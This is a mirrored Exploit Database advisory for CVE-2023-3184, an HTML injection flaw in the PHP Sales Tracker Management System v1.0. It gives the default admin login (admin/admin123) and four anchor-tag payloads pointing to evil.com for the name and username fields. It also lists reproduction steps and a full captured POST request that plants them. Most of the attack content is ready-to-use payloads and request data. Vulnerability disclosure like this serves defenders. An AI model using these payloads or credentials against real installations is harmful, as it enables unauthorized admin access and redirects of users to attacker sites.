Sales Tracker Management System v1.0 – Multiple Vulnerabilities

• Exploit Database
• 127 阅读

• 作者： AFFAN AHMED
  日期： 2023-06-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51513/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101

  Exploit Title: Sales Tracker Management System v1.0 – Multiple Vulnerabilities Google Dork: NA Date: 09-06-2023 EXPLOIT-AUTHOR: AFFAN AHMED Vendor Homepage: <https://www.sourcecodester.com/> Software Link: <https://www.sourcecodester.com/download-code?nid=16061&title=Sales+Tracker+Management+System+using+PHP+Free+Source+Code> Version: 1.0 Tested on: Windows 11 + XAMPP CVE : CVE-2023-3184   ============================== CREDENTIAL TO USE ============================== ADMIN-ACCOUNT USERNAME: admin PASSWORD: admin123   ============================= PAYLOAD_USED ============================= 1. <a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a> 2. <a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a> 3. <a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a> 4. <a href=//evil.com>CLICK_HERE_FOR_USERNAME</a>     =============================== STEPS_TO_REPRODUCE =============================== 1. FIRST LOGIN INTO YOUR ACCOUNT BY USING THE GIVENCREDENTIALS OF ADMIN 2. THEN NAVIGATE TO USER_LIST AND CLCIK ON <code>CREATE NEW</code> BUTTON OR VISIT TO THIS URL:<code>http://localhost/php-sts/admin/?page=user/manage_user 3. THEN FILL UP THE DETAILS AND PUT THE ABOVE PAYLOAD IN <code>firstname</code> <code>middlename</code><code>lastname</code> and in <code>username 4. AFTER ENTERING THE PAYLOAD CLICK ON SAVE BUTTON 5. AFTER SAVING THE FORM YOU WILL BE REDIRECTED TO ADMIN SITE WHERE YOU CAN SEE THAT NEW USERIS ADDED. 6. AFTER CLICKING ON THEEACH PAYLOAD IT REDIRECT ME TO EVIL SITE       ========================================== BURPSUITE_REQUEST ========================================== POST /php-sts/classes/Users.php?f=save HTTP/1.1 Host: localhost Content-Length: 1037 sec-ch-ua: Accept: */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7hwjNQW3mptDFOwo X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36 sec-ch-ua-platform: "" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/php-sts/admin/?page=user/manage_user Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=r0ejggs25qnlkf9funj44b1pbn Connection: close   ------WebKitFormBoundary7hwjNQW3mptDFOwo Content-Disposition: form-data; name="id"     ------WebKitFormBoundary7hwjNQW3mptDFOwo Content-Disposition: form-data; name="firstname"   <a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a> ------WebKitFormBoundary7hwjNQW3mptDFOwo Content-Disposition: form-data; name="middlename"   <a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a> ------WebKitFormBoundary7hwjNQW3mptDFOwo Content-Disposition: form-data; name="lastname"   <a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a> ------WebKitFormBoundary7hwjNQW3mptDFOwo Content-Disposition: form-data; name="username"   <a href=//evil.com>CLICK_HERE_FOR_USERNAME</a> ------WebKitFormBoundary7hwjNQW3mptDFOwo Content-Disposition: form-data; name="password"   1234 ------WebKitFormBoundary7hwjNQW3mptDFOwo Content-Disposition: form-data; name="type"   2 ------WebKitFormBoundary7hwjNQW3mptDFOwo Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream     ------WebKitFormBoundary7hwjNQW3mptDFOwo--   =============================== PROOF_OF_CONCEPT =============================== GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Sales_Tracker_Management_System/stms.md